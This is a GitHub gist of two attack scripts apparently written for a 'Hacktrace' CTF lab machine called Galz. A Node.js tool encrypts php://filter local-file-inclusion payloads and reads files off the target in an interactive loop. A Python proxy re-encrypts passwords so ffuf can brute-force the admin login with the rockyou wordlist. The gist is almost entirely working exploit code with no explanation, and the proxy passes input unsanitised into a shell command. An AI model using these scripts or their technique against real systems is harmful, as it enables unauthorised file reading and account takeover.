Last active
October 15, 2023 03:28
-
-
Save sharpicx/65086f1e56a2e355a5076f9ca42ea9e2 to your computer and use it in GitHub Desktop.
Galz - Hacktrace (bruteforcing admin pages & Automating LFI)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var cryptojs = require("crypto-js"); | |
| var axios = require("axios"); | |
| var cheerio = require("cheerio"); | |
| var readline = require("readline"); | |
| function decrypt(data) { | |
| const key = cryptojs.enc.Hex.parse("0123456789abcdef0123456789abcdef"); | |
| const iv = cryptojs.enc.Hex.parse("abcdef9876543210abcdef9876543210"); | |
| const bytes = cryptojs.AES.decrypt({ciphertext: cryptojs.enc.Base64.parse(data)}, key, {iv: iv}); | |
| return console.log(bytes.toString(cryptojs.enc.Utf8)); | |
| } | |
| function encrypt(data) { | |
| const key = cryptojs.enc.Hex.parse("0123456789abcdef0123456789abcdef"); | |
| const iv = cryptojs.enc.Hex.parse("abcdef9876543210abcdef9876543210"); | |
| const tobytes = cryptojs.AES.encrypt(data,key, { iv: iv }); | |
| return tobytes.ciphertext.toString(cryptojs.enc.Base64); | |
| } | |
| const rl = readline.createInterface({ | |
| input: process.stdin, | |
| output: process.stdout | |
| }); | |
| function quote_plus(str) { | |
| return encodeURIComponent(str) | |
| .replace(/%20/g, '+') | |
| .replace(/%21/g, '!') | |
| .replace(/%27/g, "'") | |
| .replace(/%28/g, '(') | |
| .replace(/%29/g, ')') | |
| .replace(/%2A/g, '*'); | |
| } | |
| function get(req) { | |
| fuck = quote_plus(encrypt(`php://filter/convert.base64-encode/resource=${req}`)) | |
| const url = `http://10.1.2.122:10000/dashz/?page=${fuck}`; | |
| axios.get(url) | |
| .then(response => { | |
| const $ = cheerio.load(response.data); | |
| const content = $('.chart-stage').html(); | |
| console.log(atob(content.replace(/^\s+|\s+$/g, ''))); | |
| prompt(); | |
| }) | |
| .catch(error => { | |
| console.error("[-] Error: ", error); | |
| prompt(); | |
| }); | |
| } | |
| function prompt() { | |
| rl.question('cmd> ', (input) => { | |
| if (input.trim() == "exit") { | |
| rl.close(); | |
| } else { | |
| get(input); | |
| console.log("---\n[+] encrypted: ", encrypt(input), "\n---\n"); | |
| } | |
| }); | |
| } | |
| switch (process.argv[2]) { | |
| case "loop": | |
| prompt(); | |
| break; | |
| case "encrypt": | |
| console.log(encrypt(process.argv[3])); | |
| break; | |
| case "decrypt": | |
| console.log(decrypt(process.argv[3])); | |
| break; | |
| default: | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ffuf -u http://127.0.0.1:8000/\?username=admin\&password=FUZZ\&login=login -w /opt/seclists/Passwords/Leaked-Databases/rockyou.txt -c -r -fs 1350 | |
| from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer | |
| from urllib.parse import parse_qs | |
| from pwn import log | |
| import requests, subprocess, threading | |
| class RequestHandler(BaseHTTPRequestHandler): | |
| def log_message(self, format, *args): | |
| pass | |
| def do_GET(self): | |
| target = "http://10.1.2.122:10000/" | |
| query_params = parse_qs(self.path[2:]) | |
| user = query_params.get('username', [''])[0] | |
| passwd = subprocess.check_output("node key.js \"{}\"".format(query_params.get('password', [''])[0]), shell=True, universal_newlines=True).strip() | |
| header = { | |
| "Content-Type": "application/x-www-form-urlencoded" | |
| } | |
| data = { | |
| "username": user, | |
| "password": passwd, | |
| "login": "login" | |
| } | |
| ses = requests.Session() | |
| res = ses.post(target, data=data, headers=header) | |
| content_length = len(res.content) | |
| if content_length == 1350: | |
| log.info('testing...\nusername: {}\nplain-text password: {}\nencrypted password: {}\nresponse status: {}\ncontent-length: {}\n\n'.format(user, query_params.get('password', [''])[0],passwd, res.status_code, content_length)) | |
| else: | |
| log.success('found!\nusername: {}\nplain-text password: {}\nencrypted password: {}\nresponse status: {}\ncontent-length: {}\n\n'.format(user, query_params.get('password', [''])[0],passwd, res.status_code, content_length)) | |
| self.send_response(res.status_code) | |
| self.send_header('Content-type', 'text/plain') | |
| self.end_headers() | |
| self.wfile.write(res.content) | |
| host = '127.0.0.1' | |
| port = 8000 | |
| server = ThreadingHTTPServer((host, port), RequestHandler) | |
| server.max_threads = 10 | |
| server_thread = threading.Thread(target=server.serve_forever) | |
| server_thread.start() | |
| log.warn(f"Server created by sharpicx\nhosted on {host}:{port}\n\n") | |
| log.warn("automating hacktrace machine: Galz\ngo attack it at: http://127.0.0.1/?username=FUZZ&password=FUZZ&login=login\n\n") | |
| server_thread.join() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment